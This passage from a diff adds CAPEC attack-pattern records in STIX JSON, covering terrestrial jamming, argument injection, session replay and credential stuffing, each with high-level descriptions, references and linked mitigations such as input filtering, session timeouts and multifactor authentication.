"attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DNSSEC", + "id": "course-of-action--9c484afc-3584-4587-a260-116ead182709", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c28461d-523b-453f-99b1-a60849c2db18", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c484afc-3584-4587-a260-116ead182709", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DNS-hold-open", + "id": "course-of-action--38d9ad7c-d797-454b-a4b5-f9f3b392be10", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13141463-336a-4b22-955f-de061f868998", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38d9ad7c-d797-454b-a4b5-f9f3b392be10", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary transmits disruptive signals in the direction of the target's consumer-level satellite dish (as opposed to the satellite itself). The transmission disruption occurs in a more targeted range. Portable terrestrial jammers have a range of 3-5 kilometers in urban areas and 20 kilometers in rural areas. This technique requires a terrestrial jammer that is more powerful than the frequencies sent from the satellite.", + "external_references": [ + { + "external_id": "CAPEC-599", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/599.html" + }, + { + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + "external_id": "REF-462", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--521fbe1c-28d6-4ca0-bc8b-6e2dbc91332e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Terrestrial Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8711eca6-b3ad-40b7-b7ac-08be37885119" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny, degrade, or disrupt availability of satellite communications for the target by overwhelming its resources to accurately receive authorized transmissions.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "An attempt to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These jamming signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "\n A terrestrial satellite jammer with a signal more powerful than that of the satellite attempting to communicate with the target.\n The adversary must know the location of the target satellite dish.\n " + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.", + "external_references": [ + { + "external_id": "CAPEC-6", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-146", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Jouko Pynnonen, Java Web Start argument injection vulnerability", + "external_id": "REF-482", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/archive/1/393696" + } + ], + "id": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Argument Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [REF-482]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discovery of potential injection vectors: Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.).

    2. Techniques
    Manually cover the application and record the possible places where arguments could be passed into external systems.
    Use a spider, for web applications, to create a list of URLs and associated inputs.

Experiment

  1. 1. Attempt variations on argument content: Possibly using an automated tool, the attacker will perform injection variations of the arguments.

    2. Techniques
    Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure).
    Use a proxy tool to record results, error messages and/or log if accessible.

Exploit

  1. Abuse of the application: The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application.

    2. Techniques
    Manually inject specific payload into targeted argument.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.", + "Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.", + "id": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--196a8c07-3041-48df-97b8-d20a2bf800b7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "spec_version": "2.1", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.", + "id": "course-of-action--320708f6-d5a8-4781-bcef-5d707ceeb0f0", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c3192605-c8b0-48c6-a253-ced90d7fe3e0", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--320708f6-d5a8-4781-bcef-5d707ceeb0f0", + "spec_version": "2.1", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise.", + "id": "course-of-action--9c1506e3-58e3-4856-866d-9ec6c8a8a9ad", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba5cb3e3-2de4-49cd-a6c0-587480f23acd", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c1506e3-58e3-4856-866d-9ec6c8a8a9ad", + "spec_version": "2.1", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.", + "external_references": [ + { + "external_id": "CAPEC-60", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/60.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-488", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Access Token Manipulation:Token Impersonation/Theft", + "external_id": "T1134.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134/001" + }, + { + "description": "Use Alternate Authentication Material:Web Session Cookie", + "external_id": "T1550.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/004" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Reusing Session IDs (aka Session Replay)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls. See also: CVE-1999-0428", + "Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs. See also: CVE-2002-0258" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker interacts with the target host and finds that session IDs are used to authenticate users.

  2. The attacker steals a session ID from a valid user.

Exploit

  1. The attacker tries to use the stolen session ID to gain access to the system with the privileges of the session ID's original owner.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are not well protected from session theft." + ], + "x_capec_skills_required": { + "Low": "If an attacker can steal a valid session ID, they can then try to be authenticated with that stolen session ID.", + "Medium": "More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing their valid session ID." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always invalidate a session ID after the user logout.", + "id": "course-of-action--e132b1ab-8471-4391-8be7-58657c09f46c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--908e8d74-13d5-49a7-ac4c-99df0daf47f0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e132b1ab-8471-4391-8be7-58657c09f46c", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Setup a session time out for the session IDs.", + "id": "course-of-action--887085f5-8775-46fa-bca9-fa2fa8d395a3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f28d834-ffd7-4c6d-ad68-e70a69745dc9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--887085f5-8775-46fa-bca9-fa2fa8d395a3", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate adversary in the middle attacks (CAPEC-94).", + "id": "course-of-action--4f370dea-3940-4d61-bccc-2945efaee2fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb55e2e4-e6f7-45ee-9ae9-fd7631b85a05", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f370dea-3940-4d61-bccc-2945efaee2fc", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker.", + "id": "course-of-action--c2568b87-4ece-4f22-a1c1-5305dd455ab4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71ab000c-de21-4717-95f9-4aae387d2d7c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c2568b87-4ece-4f22-a1c1-5305dd455ab4", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt the session data associated with the session ID.", + "id": "course-of-action--bfd1036e-01fb-4b7d-a112-830c3c3a4b0e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5dc170d-4034-4559-acd3-ad3cfff69416", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bfd1036e-01fb-4b7d-a112-830c3c3a4b0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use multifactor authentication.", + "id": "course-of-action--f8aa308d-e6bc-4de3-86be-da1213ff1371", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f886c45-625d-4dd6-9659-8b92fdb432e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8aa308d-e6bc-4de3-86be-da1213ff1371", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.\n ", + "external_references": [ + { + "external_id": "CAPEC-600", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/600.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Brute Force:Credential Stuffing", + "external_id": "T1110.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/004" + }, + { + "description": "Credential stuffing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + }, + { + "description": "Credential stuffing, Open Web Application Security Project (OWASP)", + "external_id": "REF-568", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times", + "external_id": "REF-569", + "source_name": "reference_from_CAPEC", + "url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/" + } + ], + "id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Stuffing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user leverages the password \"Password123\" for a handful of application logins. An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.", + "In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

    2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

  2. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

    3. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each username/password combination until the target grants access.

    2. Techniques
    Manually or automatically enter each username/password combination through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications.\n The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform.\n Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.\n Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "A known list of username/password combinations.", + "A custom script that leverages the credential list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Credential Stuffing attack is very straightforward." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": 